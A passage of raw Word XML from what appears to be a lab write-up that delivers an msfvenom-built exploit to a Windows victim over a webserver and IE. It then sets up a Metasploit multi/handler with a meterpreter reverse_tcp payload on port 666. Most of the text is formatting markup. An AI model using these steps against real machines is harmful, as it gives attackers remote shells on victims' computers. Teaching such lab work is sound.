          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> - start the basic webserver to host the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F7E1A1" w14:textId="77777777" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31FCAD34" wp14:editId="354587CD">
            <wp:extent cx="2683239" cy="1450780"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21" name="Picture 21"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Graphical user interface, text, application, email&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2700236" cy="1459970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1287BF" w14:textId="70F76234" w:rsidR="00905DB6" w:rsidRPr="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> - browse to the file in Chrome</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B67018" w14:textId="77777777" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="447633C3" wp14:editId="496B1B90">
            <wp:extent cx="4000500" cy="825500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23" name="Picture 2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Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4000500" cy="825500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="527EE28D" w14:textId="4176A317" w:rsidR="00905DB6" w:rsidRPr="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Chrome blocks the download of the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4324E084" w14:textId="77777777" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="451F32AF" wp14:editId="6EF51B3A">
            <wp:extent cx="3477718" cy="2527033"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="24" name="Picture 24" descr="Graphical user interface, text, application, emai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descr="Graphical user interface, text, application, email&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3489682" cy="2535726"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7226195C" w14:textId="77CF3DF9" w:rsidR="00905DB6" w:rsidRPr="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> - using IE lets us download the exploit to our desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F01E1DD" w14:textId="77777777" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t>Now that the exploit is on the victim machine, we need to configure Metasploit to listen for the inbound connection. First, we need to start up the PostgreSQL service, and then initialize the database, and then run `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">` to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>actually start</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Metasploit. Once we are at a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> prompt, we can run `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>db_status</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>` to show that the database connection is active.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691C7F95" w14:textId="77777777" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D2E6768" wp14:editId="5B52D1FD">
            <wp:extent cx="4467069" cy="1252434"/>
            <wp:effectExtent l="0" t="0" r="3810" b="5080"/>
            <wp:docPr id="25" name="Picture 2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Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4498279" cy="1261184"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="574D92DE" w14:textId="141AAAE2" w:rsidR="00905DB6" w:rsidRPr="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> - start database and initialize it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3935F700" w14:textId="77777777" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34B4F79F" wp14:editId="4CB6C939">
            <wp:extent cx="3492708" cy="1326582"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="26" name="Picture 26"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Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3514206" cy="1334747"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C9DEB2" w14:textId="242226CD" w:rsidR="00905DB6" w:rsidRPr="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> - start Metasploit and check database status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A539A35" w14:textId="5C9AD328" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Now that we are in Metasploit, we create a new workspace called `hacking` and check that we are using the new workspace. We run `use exploit/multi/handler/` because it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>has to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> match the exploit that we created with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>, and we `set payload windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">` for the same reason. Then we add in our local host IP address and a local listening port of 666. Once </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>all of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> our options are set, we simply run `exploit` and Metasploit will start listening on port 666 for inbound reverse shell connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7421ABB3" w14:textId="77777777" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33E47BC1" wp14:editId="56B18711">
            <wp:extent cx="2728210" cy="1395007"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="27" name="Picture 27"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descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2745542" cy="1403869"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="351E308C" w14:textId="02DE6A17" w:rsidR="00905DB6" w:rsidRPr="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> - create new workspace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419D3CE4" w14:textId="77777777" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AC9F874" wp14:editId="55596EEA">
            <wp:extent cx="5456420" cy="361740"/>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24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5519514" cy="365923"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E235C89" w14:textId="080E6092" w:rsidR="00905DB6" w:rsidRPr="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> - set Metasploit payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D83FB6F" w14:textId="77777777" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27F89796" wp14:editId="79B1C245">
            <wp:extent cx="3747292" cy="448479"/>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25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3800504" cy="454847"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72625200" w14:textId="3723B74E" w:rsidR="00905DB6" w:rsidRPr="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
